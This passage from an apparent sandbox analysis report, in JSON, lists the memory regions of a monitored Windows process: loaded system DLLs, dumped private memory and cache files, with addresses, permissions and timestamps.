1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_751", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:00:44.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_752", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:00:44.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_753", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:44.999", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_754", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:45.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_755", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:45.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_756", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:45.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_757", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:00:45.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_758", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:00:45.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_759", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:45.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000760-addr_0x0000000000170000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_760", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:45.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1955893247, "entry_point": 1955861024, "filename": "\\Windows\\System32\\version.dll", "id": "region_761", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:00:45.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2473983, "entry_point": 2097152, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_762", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:00:45.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2473983, "entry_point": 2241977, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_763", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:00:45.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_764", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:00:45.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_765", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:45.082", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000766-addr_0x0000000000190000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_766", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:45.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_767", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:45.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_768", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:45.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1591541760, "type": "region", "version": 1 }, "end_va": 1592811519, "entry_point": 1591541760, "filename": "\\Windows\\System32\\comsvcs.dll", "id": "region_769", "name": "comsvcs.dll", "norm_filename": "c:\\windows\\system32\\comsvcs.dll", "region_type": "memory_mapped_file", "start_va": 1591541760, "timestamp": "00:00:45.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947999657, "filename": "\\Windows\\System32\\atl.dll", "id": "region_770", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:00:45.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_771", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:00:45.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2342911, "entry_point": 2101901, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_772", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:00:45.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_777", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:45.208", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000778-addr_0x0000000000730000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_778", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:45.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21954560, "type": "region", "version": 1 }, "end_va": 24899583, "entry_point": 21954560, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_779", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21954560, "timestamp": "00:00:45.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_780", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:45.229", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000781-addr_0x0000000000880000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 9175039, "entry_point": 0, "filename": null, "id": "region_781", "name": "private_0x0000000000880000", "norm_filename": null, "region_type": "private_memory", "start_va": 8912896, "timestamp": "00:00:45.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000782-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_782", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:45.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000783-addr_0x0000000000220000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_783", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:45.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000784-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_784", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:45.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967054847, "entry_point": 1967002165, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_785", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:00:45.240", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000786-addr_0x0000000001840000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 25427968, "type": "region", "version": 1 }, "end_va": 25690111, "entry_point": 0, "filename": null, "id": "region_786", "name": "private_0x0000000001840000", "norm_filename": null, "region_type": "private_memory", "start_va": 25427968, "timestamp": "00:00:45.244", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000787-addr_0x00000000018d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26017792, "type": "region", "version": 1 }, "end_va": 26279935, "entry_point": 0, "filename": null, "id": "region_787", "name": "private_0x00000000018d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26017792, "timestamp": "00:00:45.244", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000788-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_788", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:45.245", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000789-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_789", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:45.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 663552, "start_va": 1588461568, "type": "region", "version": 1 }, "end_va": 1589125119, "entry_point": 1588461568, "filename": "\\Windows\\System32\\appwiz.cpl", "id": "region_790", "name": "appwiz.cpl", "norm_filename": "c:\\windows\\system32\\appwiz.cpl", "region_type": "memory_mapped_file", "start_va": 1588461568, "timestamp": "00:00:47.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 192512, "start_va": 1937047552, "type": "region", "version": 1 }, "end_va": 1937240063, "entry_point": 1937047552, "filename": "\\Windows\\System32\\duser.dll", "id": "region_791", "name": "duser.dll", "norm_filename": "c:\\windows\\system32\\duser.dll", "region_type": "memory_mapped_file", "start_va": 1937047552, "timestamp": "00:00:47.101", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_792", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:47.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1859649536, "type": "region", "version": 1 }, "end_va": 1859682303, "entry_point": 1859649536, "filename": "\\Windows\\System32\\osbaseln.dll", "id": "region_793", "name": "osbaseln.dll", "norm_filename": "c:\\windows\\system32\\osbaseln.dll", "region_type": "memory_mapped_file", "start_va": 1859649536, "timestamp": "00:00:47.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_794", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:00:47.123", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000795-addr_0x0000000000200000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_795", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:47.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_796", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:47.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_797", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:47.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2494463, "entry_point": 2490368, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_798", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:00:47.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2564095, "entry_point": 0, "filename": null, "id": "region_799", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2498559, "entry_point": 0, "filename": null, "id": "region_1384", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:00:50.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1385", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:50.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1386", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:00:50.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5652479, "entry_point": 5636096, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_1387", "name": "cversions.1.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 5636096, "timestamp": "00:00:50.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5857279, "entry_point": 5701632, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_1388", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 5701632, "timestamp": "00:00:50.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 5902335, "entry_point": 0, "filename": null, "id": "region_1389", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:00:50.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001390-addr_0x0000000001910000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 26279936, "type": "region", "version": 1 }, "end_va": 27332607, "entry_point": 0, "filename": null, "id": "region_1390", "name": "private_0x0000000001910000", "norm_filename": null, "region_type": "private_memory", "start_va": 26279936, "timestamp": "00:00:50.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1393", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:50.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5652479, "entry_point": 5636096, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1394", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 5636096, "timestamp": "00:00:50.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 8585216, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_1395", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 8585216, "timestamp": "00:00:50.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ 